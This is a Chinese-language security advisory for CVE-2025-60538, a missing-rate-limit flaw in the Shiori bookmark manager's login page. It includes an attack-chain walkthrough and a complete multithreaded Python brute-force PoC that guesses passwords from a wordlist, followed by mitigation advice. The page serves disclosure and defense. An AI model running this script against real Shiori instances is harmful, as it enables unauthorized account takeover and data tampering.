CVE-2025-60538: Shiori v1.7.4及以下版本登录页缺乏速率限制导致暴力破解

漏洞信息

漏洞编号

CVE-2025-60538

漏洞类型

缺乏速率限制/暴力破解

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

shiori

漏洞概述

CVE-2025-60538是Go语言编写的开源书签管理器Shiori的一个中危安全漏洞。该漏洞存在于Shiori v1.7.4及以下版本的Web登录页面，由于缺乏适当的速率限制（Rate Limiting）机制，攻击者可以无限制地对登录接口发起暴力破解攻击，从而绕过正常的身份验证流程获取未授权访问权限。Shiori是一款自托管的书签管理工具，支持将网页内容保存为离线HTML文件，用户可以通过Web界面管理书签。该漏洞的CVSS评分为6.5，属于中等严重程度，主要影响在网络环境下可访问Shiori实例的用户。由于攻击复杂度低且无需特殊权限，攻击者可以使用自动化工具快速尝试大量密码组合，对使用弱密码的账户构成严重威胁。此漏洞已被公开披露并分配CVE编号，厂商在后续版本中已添加速率限制功能进行修复。

技术细节

该漏洞的核心问题在于Shiori登录端点（通常为POST /login）未实现任何形式的访问控制或速率限制机制。在正常的安全实践中，登录接口应实现以下保护措施：1）账户锁定策略，在多次失败登录后临时锁定账户；2）速率限制，在短时间内限制来自同一IP的登录尝试次数；3）验证码机制，增加自动化攻击的难度。然而Shiori v1.7.4版本完全缺乏这些保护。攻击者可以使用自动化工具（如Burp Suite Intruder、Hydra或自定义脚本）对目标Shiori实例的登录页面发起持续的暴力破解攻击。攻击过程中，工具会自动提交大量不同的用户名密码组合，由于服务端无任何限制，请求可以快速连续发送。攻击者通常会使用常见的用户名（如admin、administrator）和密码字典进行尝试。对于使用弱密码的账户，攻击成功的概率较高。成功登录后，攻击者可以完全控制Shiori实例，访问、修改或删除所有书签数据，甚至可能通过进一步利用获取服务器shell权限。

攻击链分析

STEP 1

步骤1

信息收集：攻击者扫描互联网或内网中暴露的Shiori实例，确认目标版本为v1.7.4或更低版本

STEP 2

步骤2

准备攻击工具：攻击者准备暴力破解工具（如Burp Suite、Hydra或自定义Python脚本）和密码字典

STEP 3

步骤3

发送登录请求：攻击者使用自动化工具对Shiori的登录端点（POST /login）发送大量登录请求

STEP 4

步骤4

绕过速率限制：由于Shiori缺乏速率限制，攻击请求可以无限制地快速发送，无需等待或使用绕过技术

STEP 5

步骤5

验证凭证：工具自动检测成功的登录响应（包含session cookie或重定向到管理页面）

STEP 6

步骤6

获取访问权限：成功登录后，攻击者获得Shiori管理后台访问权限，可以查看、修改、删除所有书签数据

STEP 7

步骤7

持久化控制：攻击者可能创建后门账户或利用其他漏洞进一步获取服务器shell权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-60538 PoC - Shiori Login Brute Force (Lack of Rate Limiting)
This PoC demonstrates the vulnerability in Shiori v1.7.4 and below
where the login page lacks rate limiting, allowing unlimited login attempts.

Usage: python3 cve-2025-60538.py <target_url> <username> <password_list>
Example: python3 cve-2025-60538.py http://localhost:8080 admin passwords.txt
"""

import requests
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed

# Suppress SSL warnings for testing purposes
requests.packages.urllib3.disable_warnings()

def try_login(target_url, username, password):
    """Attempt to login with given credentials"""
    login_url = f"{target_url.rstrip('/')}/login"
    
    data = {
        'username': username,
        'password': password
    }
    
    try:
        response = requests.post(login_url, data=data, timeout=10, allow_redirects=False)
        
        # Check if login successful (Shiori sets session cookie on success)
        if response.status_code in [200, 302] and 'shiori_session' in response.cookies:
            return {
                'success': True,
                'password': password,
                'message': f'SUCCESS! Password found: {password}'
            }
        elif response.status_code == 302 and 'Location' in response.headers:
            return {
                'success': True,
                'password': password,
                'message': f'SUCCESS! Password found: {password}'
            }
        else:
            return {
                'success': False,
                'password': password,
                'message': f'Failed attempt: {password}'
            }
    except requests.exceptions.RequestException as e:
        return {
            'success': False,
            'password': password,
            'message': f'Error: {str(e)}'
        }

def main():
    if len(sys.argv) != 4:
        print("Usage: python3 cve-2025-60538.py <target_url> <username> <password_file>")
        sys.exit(1)
    
    target_url = sys.argv[1]
    username = sys.argv[2]
    password_file = sys.argv[3]
    
    print(f"[*] CVE-2025-60538 - Shiori Login Brute Force")
    print(f"[*] Target: {target_url}")
    print(f"[*] Username: {username}")
    print(f"[*] Loading passwords from: {password_file}")
    
    try:
        with open(password_file, 'r') as f:
            passwords = [line.strip() for line in f if line.strip()]
    except FileNotFoundError:
        print(f"[-] Password file not found: {password_file}")
        sys.exit(1)
    
    print(f"[*] Loaded {len(passwords)} passwords")
    print(f"[*] Starting brute force attack (no rate limiting protection)...")
    print("-" * 60)
    
    start_time = time.time()
    attempt_count = 0
    
    # Use threading for faster brute force (demonstrating lack of rate limiting)
    with ThreadPoolExecutor(max_workers=10) as executor:
        futures = {executor.submit(try_login, target_url, username, pwd): pwd for pwd in passwords}
        
        for future in as_completed(futures):
            attempt_count += 1
            result = future.result()
            
            if result['success']:
                elapsed = time.time() - start_time
                print(f"\n[+] {result['message']}")
                print(f"[*] Total attempts: {attempt_count}")
                print(f"[*] Time elapsed: {elapsed:.2f} seconds")
                print(f"[*] Attempts per second: {attempt_count/elapsed:.2f}")
                executor.shutdown(wait=False)
                for f in futures:
                    f.cancel()
                break
            else:
                if attempt_count % 10 == 0:
                    print(f"[*] Progress: {attempt_count}/{len(passwords)} attempts...")
    
    if attempt_count == len(passwords):
        print(f"\n[-] Brute force completed. Password not found in wordlist.")
        print(f"[*] Total attempts: {attempt_count}")

if __name__ == "__main__":
    main()

影响范围

shiori < 1.7.5 (v1.7.4及以下所有版本)

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）在反向代理（如Nginx）中配置登录接口的速率限制，例如使用limit_req_zone限制同一IP每分钟登录尝试次数；2）使用Fail2Ban等入侵防御工具监控Shiori登录日志，自动封禁发起大量失败登录请求的IP地址；3）限制Shiori实例的网络暴露范围，避免直接暴露在互联网；4）启用强密码策略并定期更换密码；5）配置异常登录行为告警，及时发现暴力破解攻击尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60538
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60538
3 Details https://www.cvedetails.com/cve/CVE-2025-60538/
4 VulDB https://vuldb.com/cve/CVE-2025-60538
5 Link https://github.com/go-shiori/shiori
6 Link https://github.com/go-shiori/shiori/issues/1138